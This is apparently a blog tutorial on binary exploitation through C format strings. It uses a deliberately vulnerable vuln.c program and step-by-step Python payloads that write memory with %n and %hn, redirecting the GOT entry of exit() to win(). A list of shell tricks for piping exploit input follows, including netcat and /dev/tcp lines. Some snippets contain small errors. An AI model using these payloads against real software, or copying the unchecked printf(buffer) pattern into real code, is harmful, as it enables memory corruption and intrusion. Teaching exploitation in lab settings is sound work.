Published
- 10 min read
Binary Exploitation - Format Strings
Format Strings
There are days in Hacking when things don’t work as expected - such happened to our latest topic. Instead, we’ll have a look at a more historic topic: Format String Exploits
.
The second half of the article is a quick reminder, you can execute
stuff in bash in more than one way.
Overview
https://cs155.stanford.edu/papers/formatstring-1.2.pdf
- fprintf - prints to a FILE stream
- printf - prints to stdout
- sprintf - prints to a string
- snprintf - prints to a string with length checking
- setproctitle - set argv[]
- syslog - output to syslog
They all have in common that we can use format strings
- the format string(s) will be inside the first argument, the content they represent are in the second argument: char *buffer; printf('Test: %p', buffer)
- %s - string
- %p - pointer
- %d - decimal
- %x - hexadecimal
- %u - unsigned decimal
- %n - number of bytes written so far
If we provide more format strings than variables, we can observe the following behaviour:
int a = 10;
int *b;
char *c = "mystring";
printf('%x %x %x %x \n', a, b, c)
// Output:
// a, 804871, 80484d0, 1
Check the stack and notice: The first address is the return address and the second one points to our formating string.
$ x/6wx $esp
0xbfffef7c: 0x0804843d 0x080484d8 0x0000000a 0x08048471
0xbfffef8c: 0x080484d0 0x00000001
$ x/s 0x080484d8
0x080484d8: '%x %x %x %x \n'
The remaining four items are the same hex values that were printed by the format strings. As the user is responsible for supplying the proper amount of args, there’s no segfault or error. As every other function, during the call all args are being pushed to the stack. First the formatting, then the args to be formated.
Missing variables are assumed to be items down the stack.
Example 2:
int a = 10;
int *b;
char *c = "mystring";
printf('%08p %08p %08p %08p \n', a, b, c)
// Output:
// 0x0000000a, 0x08048471 ,0x080484d0, 0x00000001, 0x0000000a, 0x080484d0
- Format string vulns were considered dead until 2019, when several exploits where published by security researchers, exploiting format strings vulns and allowing pre-auth RCE on a router: https://blog.orange.tw/2019/07/attacking-ssl-vpn-part-1-preauth-rce-on-palo-alto.html
- You can abuse format strings to get code execution
Chars that break puts, gets, scanf, printf
puts, gets and printf will break on nullbyte. scanf however will not, but only on 0xA-0xE and 0x20
Exploiting format strings
vuln.c
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
int target;
void win()
{
char *flag = "You won. Here's your flag MFOX{I_Kn0w_Form4t_Str1ngs}"
printf(flag);
_exit(1);
}
void vuln()
{
char buffer[512];
fgets(buffer, sizeof(buffer), stdin);
printf(buffer);
exit(1);
}
int main(int argc, char **argv)
{
vuln();
}
Let’s alter the execution flow to get to the win() function.
- vuln() takes user input from stdin into a 512 byte sized buffer
- That buffer then is passed as argument to printf
- If we provide user input like
%x %x %x
the function will print contents of the stack - What we didn’t know yet:
printf
can alsowrite to memory
To exploit, start simple:
buff = ""
buff += "AAAA"
buff += " %p" * 10
print(buff)
As expected, we get random items from the stack. But could we also get the four A’s we put in earlier?
Direct Parameter Access
http://www.cis.syr.edu/~wedu/Teaching/cis643/LectureNotes_New/Format_String.pdf
- Direct Parameter Access os a special format string layout. We can write
%3$p
to get the third value formatted as the pointer. - So when we input
AAAA %4$p
we might get the outputAAAA 0x41414141
- Unfortunately we cannot use
AAAA %4$s
to get the string representation instead of hex, the app will just segfault
The reason for this is: Some format strings need a pass by reference
, some need a pass by value
In c
, pass-by-reference means a pointer to the argument.
%s
wants pass-by-reference, which we can’t supply - or can we?
Sure enough,0x41414141
likely isn’t a valid pointer address. But we can input whatever we want instead ofAAAA
%n
wants pass-by-reference - and it allows writing bytes to memory instead of reading.
But: It needs the format(int*)&address
, that means a pointer to a valid memory location where the output of %n can be written to%p
wants pass-by-value - it will print directly the values on the stack%d
wants pass-by-value%u
wants pass-by-value%x
wants pass-by-value
Use %n to change the value of a variable
In the vuln.c app above, we created an int target
as global var. If we provide the address of target
to %n
we can change it’s value.
$ p &target
$1 = (<data variable, no debug info> *) 0x804a048 <target>
To exploit it, we need to provide proper endianess.
import struct
target_addr = 0x804a048
buff = ""
buff += struct.pack("<I", target_addr)
buff += " %p" * 3 # Our input is reflected back to printf as
# 4th position on the stack
buff += "A" * 0x41 # As %n writes "the number of bytes written"
buff += "%n" # we try that way to write 0x41 to "target"
print(buff)
But if we check in GDB, the value is 0x64. We need to adapt the exploit:
import struct
target_addr = 0x804a048
buff = ""
buff += struct.pack("<I", target_addr)
buff += "A" * (0x41 - len(buf))
buff += "%4$n"
print(buff)
Back in GDB p target
we finally get 0x41 - and are close to the “write-what-where” condition. Yet, writing a memory address like 0x8040000 would require a few hundred million of “A”s. This likely will kill everything else, including the terminal. :D
%n short writes
Using the format %hn
we can write 2 bytes (multiple times) and overwrite the two most significant bytes with a 2-byte int. So, if we want to write:
0x41414141 to address 0x08040102
we need to
- write 0x4141 to 0x8040102
- write 0x4141 to 0x8040104
This is getting complicated, that why another example, where we want to write 0x41424344.
Due to the stack, we need to first write 0x4344 and then 0x4142.
import struct
target_addr = 0x804a048
target_addr_high = 0x804a048 + 2
buff = ""
buff += struct.pack("<I", target_addr)
buff += struct.pack("<I", target_addr_high)
count = 0x4344-len(buff)
buff += "%" + str(count) + "p" # %123p for example
buff += "%4$hn" # Direct Parameter Access, writing the value to
# 2 bytes, to the location pointed to by the 4th
# parameter on the stack
# count = 0x4142 - 0x4344 # intuitively we would try this but we already
# printed a lot of stuff we need to take into
# account for the actual length - this would
# result in target = 0x45464344
# In short: we can't go lower than the first
# number.
count = 0x14142 - 0x4344 # Using a trick: Making it a 3-byte value by
# adding 1 on the left
buff += "%" + str(count) + "p"
buff += "%4$hn"
print buff
Result: target = 0x41424344
To actually make something useful out of it, we could:
- Overwrite the return address with the address of the win() function (w/o ADLR)
- We could place shellcode in the environment variables (those are on the stack, too!) and then use this address (w/o ADLR)
- Overwrite the GOT address of another function, e.g. exit(), with the address of win()
- Overwrite dynamic sections like .dtors https://www.win.tue.nl/~aeb/linux/hh/formats-teso.html
import struct
win_addr = 0x80484eb # look up all addresses in GDB or objdump
# of course only works without ASLR - if it's
# on we could try a bruteforce approach
exit_GOT_addr = 0x804a01c
exit_GOT_addr_high = 0x804a01c + 2
buff = ""
buff += struct.pack("<I", exit_GOT_addr_high)
buff += struct.pack("<I", exit_GOT_addr)
count = 0x804 - len(buff)
buff += "%" + str(count) + "p"
buff += "%4$hn" # first we write the high bytes
count = 0x84eb - 0x804 # then the low bytes - if your calculation is off
# maybe go trial-and-error with GDB and adjust
buff += "%" + str(count) + "p"
buff += "%5$hn" # same thing for the `5` here, seems
# to be not 100% scientific what to use when
print buff
http://www.cis.syr.edu/~wedu/Teaching/cis643/LectureNotes_New/Format_String.pdf
https://medium.com/@airman604/protostar-format-4-walkthrough-b8f73f414e59
Reminder: cat trick
If we manage to execute a shell, e.g. because it’s already in the win() function, but we don’t have stdin connected, we can use cat
instead to keep it open and to redirect stdin:
$ (cat exploit.bin; cat) | ./vuln_app`
As we learned in pwn.college, there are at least a dozend more ways to accomplish the same thing, and usually one works.
It’s impossible to show over 1000 challenges and what we learned from the greatest course in history, in a few lines. We just tried to compile a bread and butter
list, it makes sense in certain situations, surely not in all.
Utilizing FIFO for Input Redirection
Create a FIFO to send input to your application, emulating interactive stdin behavior in a scriptable manner.
$ mkfifo myfifo; cat exploit.bin > myfifo & ./vuln_app < myfifo
Leveraging tee for Output Inspection
Use tee
alongside cat
to inspect the payload being sent to the application, useful for debugging complex inputs.
$ (cat exploit.bin; cat) | tee debug_output.bin | ./vuln_app
Employing socat for Advanced I/O Redirection
socat
can be used to create more complex bidirectional pipes, perfect for when you need to interact with network services.
$ socat EXEC:'./vuln_app',pty STDIN
Using tail -f for Persistent Input
Similar to cat
, tail -f
can be used to keep a session open indefinitely, especially useful for log file manipulation.
$ (tail -f /dev/null; cat) | ./vuln_app
Redirecting with echo and cat
Combine echo
with cat
for situations where initial setup commands are followed by a need for persistent stdin.
$ (echo "initial command"; cat) | ./vuln_app
Combining cat with nc for Network Interaction
When dealing with network sockets, nc
(netcat) combined with cat
can be used to interact with remote services.
$ cat exploit.bin | nc target.com 1234
Scripting Interaction with Python
Python’s subprocess
module can script interaction with processes, offering a programmable alternative to cat
.
import subprocess
process = subprocess.Popen(['./vuln_app'], stdin=subprocess.PIPE)
process.communicate(input=b'exploit data\n')
Redirecting input with Python for more control
Python can be used for more complex input redirection scenarios, especially when you need to process data before sending it.
import subprocess
with open('exploit.bin', 'rb') as f:
subprocess.run(['./vuln_app'], stdin=f)
Executing with bash for dynamic command execution
Use bash -c
to dynamically construct and execute commands, leveraging exec’s ability to replace the shell with a command or application.
$ bash -c 'exec ./vuln_app < <(cat exploit.bin)'
Piping into exec for inline execution
Incorporate pipes with exec
to execute commands and manage input/output streams directly within the same shell process.
$ cat exploit.bin | exec ./vuln_app
Using exec with file descriptors
Manipulate file descriptors directly with exec
to redirect them before executing a command, providing precise control over where data is sent and received.
$ exec 3< exploit.bin; exec ./vuln_app <&3
Exec and tee for live feedback
Combine exec
with tee
to execute a command while also duplicating its input to the terminal, allowing for live monitoring of sent payloads.
$ exec > >(tee /dev/tty) 2>&1; cat exploit.bin | ./vuln_app
Using cat with FIFO for input redirection
Redirect stdin through a FIFO pipe to simulate live input or feed data progressively.
$ mkfifo mypipe
$ cat exploit.bin > mypipe & ./vuln_app < mypipe
Using expect for interactive applications
expect
is a tool for automating interactive applications by simulating a tty.
$ expect -c 'spawn ./vuln_app; send -- "$(cat exploit.bin)\r"; interact'
Sending signals with kill and trap
Combine cat
with kill
to send signals based on content read, useful for triggering actions in a program.
$ cat signal_trigger.txt | while read line; do kill -"$line" $(pidof vuln_app); done
Combining echo and redirection for simple payloads
For smaller, simpler payloads, echo
combined with shell redirection can be effective.
$ echo -e "GET / HTTP/1.1\r\n\r\n" > /dev/tcp/localhost/80